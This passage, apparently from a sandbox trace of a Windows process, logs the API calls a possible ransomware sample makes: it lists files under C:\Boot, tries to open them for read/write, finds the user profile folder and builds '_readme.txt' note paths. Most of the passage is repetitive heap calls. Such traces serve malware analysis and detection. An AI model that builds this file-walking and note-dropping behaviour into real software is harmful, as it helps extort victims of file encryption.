cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.603] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.603] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.604] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0179.604] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.604] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.605] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.605] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.605] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.637] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0179.637] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.637] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.637] PathFindFileNameW (pszPath="") returned="" [0179.637] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.638] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.638] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.638] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.638] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0179.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 